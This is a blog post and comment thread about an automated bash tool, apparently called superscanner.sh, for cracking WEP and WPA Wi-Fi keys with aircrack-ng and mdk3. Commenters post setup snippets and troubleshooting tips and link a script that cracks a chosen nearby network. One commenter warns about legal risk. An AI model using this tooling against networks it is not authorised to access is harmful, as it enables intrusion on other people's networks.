I’ve become a semi-expert on wireless networking and their security features.. and how to get around them. Before I continue I want to emphasize:
The act of cracking encryption is not illegal just like picking a lock is not illegal. It is the unauthorized access of that network which is illegal, just like breaking and entering is illegal.
So. To sum it up, there are two types of encryption. There is the weak kind (wep) and the strong kind (wpa). WEP can be broken in about 5-10 minutes. WPA can be broken in about 24 hours (as long as their password is in your password try-out list).
The actual process or hacking into a network like this requires a suite of tools called the aircrack-ng suite. You can read their tutorials and such, and I highly recommend you do if you want to get into this sort of thing. It’s a lot of FUN! Be prepared to learn linux while you are at it….
But, once you understand what you are doing, you will appreciate the tool I have written. It automates the process of getting the keys. I wrote it as a type of “set-it-and-forget-it” tool that I could just leave running. It isn’t too clean, but if you can read bash scripting you can figure it out.
Here is a screen shot of my tool cracking wep
Remember! Don’t try to just run this tool without understanding what it does and how to read it. If you haven’t breaking a wep key manually you don’t want to run this. It does WEP and WPA cracking (saving the handshake for later). Good luck! I will provide minimal support via comments on this post. Don’t forget to have your radio in monitor mode first, and if you areĀ going to do wpa you need the mdk3 tool.
Here is the download link to Kyle’s Wireless Cracking Tool.
Here is a link to a more updated versio of my Cracking Tool.
hi
your tool has me baffled. Ive used aircrack-ng before but am new to linux/scripts although i have run other aircrack scripts before. This is what i get in terminal. Maybe i have to manually specify my injection interface, which is mon0…im not too sure. Any idea…thanks
superscanner.sh: 57: source: not found
rm: cannot remove `temp*’: No such file or directory
No interface specified.
“airodump-ng –help” for help.
kill: 57: No such process
Hmm, if you want you can email or twitter me and I’ll help you get it going. I’m not sure what is going wrong there, are you using bash? Are you using at least aircrack-ng 1.0?
Do you have an updated code for ubuntu 9.04 bash and the latest aircrack?
I find that you can simplify the process by removing the code ’source config’ and replacing that with this code i have just written;
”
iwconfig|grep “IEEE”|cut -b 1,2,3,4,5 > temp
for IEEE in `cat temp`; do WIFI=`echo $IEEE`; done
rm temp
airmon-ng start $WIFI > temp
rm temp
iwconfig|grep “Monitor”|cut -b 1,2,3,4,5 > temp
for tdevice in `cat temp`; do DEVICE=`echo $tdevice`; done
rm temp
”
Oh, and only by dissecting your script did i learn how to do that; so thank you for teaching about ‘grep’ and ‘cat’, very useful.
My mistake, throw in this code:
WIFI=”export DEVICE=”`echo $DEVICE`
echo $WIFI > config
just under my other additions.
Awesome! Yea man, I feel like I write cat-grep-sed everywhere. I like the config file because often I use 2 cards, one for hacking and one for surfing. Also maybe someday I’ll throw in more variables to allow easier tweaking for different environments.
Also I’ve updated the page with a more recent version of the superscanner, it may be a little better.
Do you mind if i use this program in live cd? I’d like to try and makesomethnig like ophcrack live cd but cracking wifi instead of windows login…
Feel free man, goto town!
I have noticed that the program ’superscanner.sh’ keeps trying to open “temp-01.txt”. For some reason my aircrack does not make that file, but it does make temp-01.csv. this causes an error that just sents the program in to a loop. Its a simple fix. Just change “temp-01.txt” to “temp-01.*” in the line
cat temp-01.txt | strings | grep -B1000 Station | grep “:” | cut -f 1,4,5,6,8,14 -d “,” | sort -k 4 > templist
Yea aircrack’s behavior changed from .9 to 1.0, ymmv. Hey this is kinda an inefficient way to communicate. You can email me at kyle@xkyle.com or jabber im at the same address.
In the file “Break.sh” and “are-there-any-near-me” i see references to a device called “ath0″ instead of calling this device with the $DEVICE var. Just a note for those who run in to this problem. Simple fix; just replace the words ‘ath0′ with the name of your card or ‘$DEVICE’
http://pastebin.com/m421e1bc4
Heres an intresting code i worte. And with the some code taken from your script i updated it. Let me know what you think. And if you want you can host if here on your site. What this code does is this; If you just run it, it will display a list of wifis around you and ask you to choose one. Once you have chosen it will begin to crack it. once done it will write what it finds to your home DIR and close down the program.
If you already know the Mac, the channel and the essid of the wifi you want to get in to you can simply run the with the mac, channel and essid after it… like this:
./programname 00:00:00:00:00 1 LiNKSYS
I have been caught up in the fixes and such that i forgot to mention something;
Fantastic program! thanks for taking the time to write it!
Kyle,
Thanks very much for your effort making this. I just wanted to let you know that it seems to have a problem running on the slitaz aircrack-ng distro, both with spawning x sessions [*] and also the command “ip” used in break.sh to derive the adapter’s MAC doesn’t appear to exist in the version I’ve got (0.78) either.
If you have any pointers about these I’d love to hear them as it’s not my area of expertise at all. Thanks again.
[*] I get a message about being unable to access the display, the same message I get if I type “xterm” from the shell. The aircrack-ng MOTD specifically suggests using startx rather than xterm to open an x session but I don’t know why this is – substituting startx for xterm in your script doesn’t seem to solve the problem
Hi Kyle i’am having a problem downloading your tool. I am using windows xp and firefox’s foxyproxy thru my G1 phone. Please help.
Just because something is not illegal does not mean that you won’t be arrested for it. A random beat cop probably isn’t going to understand the distinction between passive wireless sniffing, actively connecting to a network, and whether the cracking should be prosecuted under the anti-circumvention measures of the DMCA.
So, even if it’s legal you may still have to spend 5 to 6 figures on lawyers to defend your position in court. Take, for example, Randall Schwartz, who ended up without a felony record but only after spending a quarter million dollars.
And be sure that once they have you and have confiscated all your computer gear, they will be looking very closely at all of your actions, for anything they can add onto your offense list. They can probably get you on one of those 3 felonies you commit every day (http://online.wsj.com/article/SB10001424052748704471504574438900830760842.html).
Sean